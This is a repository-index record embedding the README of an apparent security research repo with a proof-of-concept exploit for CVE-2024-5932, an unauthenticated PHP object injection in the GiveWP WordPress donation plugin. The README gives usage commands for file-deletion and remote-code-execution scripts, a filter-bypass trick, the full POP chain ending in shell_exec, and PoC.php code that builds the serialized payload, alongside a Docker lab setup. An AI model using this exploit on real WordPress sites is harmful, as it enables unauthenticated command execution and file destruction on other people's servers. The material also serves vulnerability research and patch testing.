{"id":22218281,"url":"https://github.com/eqstlab/cve-2024-5932","last_synced_at":"2025-05-11T21:14:24.739Z","repository":{"id":254695500,"uuid":"847287273","full_name":"EQSTLab/CVE-2024-5932","owner":"EQSTLab","description":"GiveWP PHP Object Injection exploit","archived":false,"fork":false,"pushed_at":"2025-01-12T11:24:26.000Z","size":25,"stargazers_count":57,"open_issues_count":3,"forks_count":10,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-11T21:14:19.079Z","etag":null,"topics":["cve","cve-2024-5932","exploit","givewp","object-injection","php","poc","proof-of-concept","security","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EQSTLab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-25T11:51:36.000Z","updated_at":"2025-04-11T15:52:52.000Z","dependencies_parsed_at":"2024-12-02T22:20:41.272Z","dependency_job_id":"4e1654c8-0a64-44b4-b62d-b378a3cfa01a","html_url":"https://github.com/EQSTLab/CVE-2024-5932","commit_stats":null,"previous_names":["eqstseminar/cve-2024-5932","eqstlab/cve-2024-5932"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-5932/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories
/EQSTLab%2FCVE-2024-5932/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EQSTLab","download_url":"https://codeload.github.com/EQSTLab/CVE-2024-5932/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253633147,"owners_count":21939392,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","cve-2024-5932","exploit","givewp","object-injection","php","poc","proof-of-concept","security","vulnerability"],"created_at":"2024-12-02T22:20:05.958Z","updated_at":"2025-05-11T21:14:24.694Z","avatar_url":"https://github.com/EQSTLab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"This post is a research article published by [EQSTLab](https://github.com/EQSTLab).\n\n\n## ❗❗ IMPORTANT ❗❗ \n**There are currently fake PoC github repositories running xmrig. 
Check out the links below for more information**:\n\nURL1: https://x.com/win3zz/status/1828704644987511107\n\nURL2: https://x.com/bornunique911/status/1828712791844524453\n\nURL3: https://x.com/Chocapikk_/status/1828801346637856841\n\n# CVE-2024-5932\n★ CVE-2024-5932 Arbitrary File Deletion and RCE PoC ★\n\nhttps://github.com/user-attachments/assets/333e347a-fd71-404a-962b-2d0d4bb952c7\n\n## Timeline\n**Aug 25**: CVE-2024-5932 file deletion PoC uploaded\n\n**Aug 26**: We have successfully executed arbitrary commands using CVE-2024-5932, but are considering disclosure due to the impact.\n\n**Aug 27**: We found a detailed analysis of the PoC in a [post](https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/) by Julien Ahrens of RCE Security and decided to publish our RCE PoC. We uploaded an additional RCE PoC as **CVE-2024-5932-rce.py**.\n\n## Description\nCVE-2024-5932: GiveWP PHP Object Injection vulnerability\n\nDescription: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. 
The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.\n\n## How to use\n\n### Git clone\n```sh\ngit clone https://github.com/EQSTLab/CVE-2024-5932.git\ncd CVE-2024-5932\n```\n### Install packages\n```sh\npip install -r requirements.txt\n```\n### Command\n```sh\n# Arbitrary file deletion\npython CVE-2024-5932.py -u \u003cURL_TO_EXPLOIT(Donation Form URL)\u003e -f \u003cFILE_TO_DELETE\u003e\n# Remote code execution\npython CVE-2024-5932-rce.py -u \u003cURL_TO_EXPLOIT(Donation Form URL)\u003e -c \u003cCOMMAND_TO_EXECUTE\u003e\n```\n\n### Example\n```sh\npython CVE-2024-5932.py -u http://example.com/2024/08/24/donation2/ -f /tmp/test\npython CVE-2024-5932-rce.py -u http://example.com/2024/08/24/donation2/ -c \"touch /tmp/test\"\n```\n\n### Output\n**CVE-2024-5932.py**\n![0](https://github.com/user-attachments/assets/4ce2bce6-4a24-4d73-9c7e-becd12f2dbe0)\n\n**CVE-2024-5932-rce.py**\n![1](https://github.com/user-attachments/assets/d68f4ebf-a1e0-4389-b9e4-e1d23c6fa235)\n\n### Result\n![image](https://github.com/user-attachments/assets/613f6f4f-8de3-4200-8f29-b46719083bff)\n![2](https://github.com/user-attachments/assets/3bf5402d-baf2-4bc0-8452-8f249a55ebe3)\n\n## Vulnerable Environment\n### 1. docker-compose.yml\n```yaml\nservices:\n  db:\n    image: mysql:8.0.27\n    command: '--default-authentication-plugin=mysql_native_password'\n    restart: always\n    environment:\n      - MYSQL_ROOT_PASSWORD=somewordpress\n      - MYSQL_DATABASE=wordpress\n      - MYSQL_USER=wordpress\n      - MYSQL_PASSWORD=wordpress\n    expose:\n      - 3306\n      - 33060\n  wordpress:\n    image: wordpress:6.3.2\n    ports:\n      - 80:80\n    restart: always\n    environment:\n      - WORDPRESS_DB_HOST=db\n      - WORDPRESS_DB_USER=wordpress\n      - WORDPRESS_DB_PASSWORD=wordpress\n      - WORDPRESS_DB_NAME=wordpress\nvolumes:\n  db_data:\n```\n\n### 2. Download the vulnerable GiveWP plugin (version 3.14.1):\nhttps://downloads.wordpress.org/plugin/give.3.14.1.zip\n\n### 3. Unzip the GiveWP plugin archive and copy the extracted `give` directory into the container's `/var/www/html/wp-content/plugins` directory.\n```sh\ndocker cp give docker-wordpress-1:/var/www/html/wp-content/plugins\n```\nThe container name `docker-wordpress-1` assumes the compose project directory is named `docker` (Compose names containers `\u003cproject\u003e-\u003cservice\u003e-\u003cindex\u003e`); adjust it to match `docker ps`.\n\n### 4. Activate the GiveWP plugin\n![image](https://github.com/user-attachments/assets/11c37afa-17dc-48bf-8819-d0bf24daaab8)\n\n### 5. Add a new post containing a GiveWP donation form and copy the post link\n![image](https://github.com/user-attachments/assets/6b806d89-dfa6-44be-809c-03ba3f666605)\n\n### 6. Check the vulnerable link\n![image](https://github.com/user-attachments/assets/23247a02-d8a0-4bcc-8c3b-0d424dba260d)\n\n### (Optional) Set up the target file in the Docker environment\nFirst, open a root shell in the WordPress container:\n```sh\ndocker exec -it -u root docker-wordpress-1 /bin/bash\n```\n\nIf the file is owned by root, the web server process (www-data) may not be able to delete it. Therefore, create the test file and change its ownership with the following command:\n```sh\ntouch test \u0026\u0026 chown www-data test\n```\n![image](https://github.com/user-attachments/assets/eb46528d-975a-46d3-b917-0a144252798f)\n\n## Debugging through PHPSTORM\nYou can debug GiveWP with PHPSTORM.\n\n### 1. Install Xdebug in the WordPress container (Docker):\n```sh\npecl install xdebug\n```\n\n### 2. Then configure WordPress's php.ini as follows (Docker):\n```ini\n[DEBUG]\nzend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20200930/xdebug.so\nxdebug.mode=debug\nxdebug.start_with_request=trigger\nxdebug.remote_enable=on\nxdebug.remote_handler=dbgp\nxdebug.client_host={your_PHPSTORM_address}\nxdebug.client_port={your_PHPSTORM_debugging_port}\nxdebug.idekey=PHPSTORM\nxdebug.profiler_enable_trigger=1\nxdebug.trace_enable_trigger=1\n```\nReplace `{your_PHPSTORM_address}` and `{your_PHPSTORM_debugging_port}` with the host and port PHPSTORM listens on. The `zend_extension` path embeds the PHP API version (20200930 is PHP 8.0); use the path that `pecl install` prints. The `xdebug.remote_*` and `*_enable_trigger` keys are Xdebug 2 settings that Xdebug 3 (what `pecl install xdebug` installs today) ignores; `xdebug.mode` and `xdebug.start_with_request` are the lines that enable the debugger here. Then you can debug your WordPress.\n\n### 3. 
Configure PHPSTORM as follows (local):\n![image](https://github.com/user-attachments/assets/d236eeba-b482-43e3-9028-3651cdbd10fd)\n![image](https://github.com/user-attachments/assets/021c0cea-fbec-46e5-8824-bf6fd1feaed4)\n\n### 4. PHPSTORM example (e.g. TCPDF arbitrary file deletion)\n![image](https://github.com/user-attachments/assets/433c4824-314e-4982-bf85-34640a259053)\n\n# Analysis\n## Vulnerable point (includes/payments/class-give-payment.php)\nHere the get_meta() function unserializes the previously saved \"give_title\" value.\n```php\nswitch ( $key ) {\n\tcase 'title':\n\t\t$user_info[ $key ] = Give()-\u003edonor_meta-\u003eget_meta( $donor-\u003eid, '_give_donor_title_prefix', true );\n\t\tbreak;\n\t...\n```\n\n## Bypass technique\nstrip_tags: replace nullbytes -\u003e using \\0\n\nstripslashes_deep: replace backslashes -\u003e using \\\\\\\\\\\\\\\\\n\n## POP chaining for RCE\n1. Stripe\\StripeObject-\u003e__toString()\n2. Stripe\\StripeObject-\u003etoArray()\n3. Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData-\u003etoArray()\n4. Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData-\u003egetLegacyBillingAddress()\n5. Give-\u003e__get('address1')\n6. \\Give\\Vendors\\Faker\\ValidGenerator-\u003eget('address1')\n7. \\Give\\Vendors\\Faker\\ValidGenerator-\u003e__call('get', 'address1')\n8. Give\\Onboarding\\SettingsRepository-\u003eget('address1') (returns the command string)\n9. call_user_func('shell_exec', 'command')\n\nPoC.php\n```php\n\u003c?php\n// Stand-in classes carrying only the properties the POP chain above reads;\n// serialize() at the bottom emits the payload.\nnamespace Stripe{\n\tclass StripeObject\n\t{\n\t\tprotected $_values;\n\t\tpublic function __construct(){\n\t\t\t$this-\u003e_values['foo'] = new \\Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData();\n\t\t}\n\t}\n}\n\nnamespace Give\\PaymentGateways\\DataTransferObjects{\n\tclass GiveInsertPaymentData{\n\t\tpublic $userInfo;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this-\u003euserInfo['address'] = new \\Give();\n\t\t}\n\t}\n}\n\nnamespace{\n\tclass Give{\n\t\tprotected $container;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this-\u003econtainer = new \\Give\\Vendors\\Faker\\ValidGenerator();\n\t\t}\n\t}\n}\n\nnamespace Give\\Vendors\\Faker{\n\tclass ValidGenerator{\n\t\tprotected $validator;\n\t\tprotected $generator;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this-\u003evalidator = \"shell_exec\";\n\t\t\t$this-\u003egenerator = new \\Give\\Onboarding\\SettingsRepository();\n\t\t}\n\t}\n}\n\nnamespace Give\\Onboarding{\n\tclass SettingsRepository{\n\t\tprotected $settings;\n\t\tpublic function __construct()\n\t\t{\n\t\t\t$this-\u003esettings['address1'] = 'touch /tmp/EQSTtest';\n\t\t}\n\t}\n}\n\nnamespace{\n\t$a = new Stripe\\StripeObject();\n\techo serialize($a);\n}\n```\n\n# Attack Scenario\n## RCE through the POP chain\nThe POP chain allows remote command execution.\n![image](https://github.com/user-attachments/assets/bb6773cc-34e3-4f05-9758-f3fe649bd6de)\n\n## Arbitrary file deletion\nThe arbitrary file deletion is reached through TCPDF.\n\n# Disclaimer\nThis repository is not intended to be an object injection exploit for CVE-2024-5932. The purpose of this project is to help people learn about this vulnerability and, perhaps, test their own applications.\n\n# EQST Insight\nWe publish CVE and malware analysis once a month. 
If you're interested, please follow the links below to check out our publications.\nhttps://www.skshieldus.com/eng/business/insight.do\n\n# Reference\nhttps://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/\n\nhttps://skshieldus.com/eng/business/insight.do#\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-5932","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feqstlab%2Fcve-2024-5932","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-5932/lists"}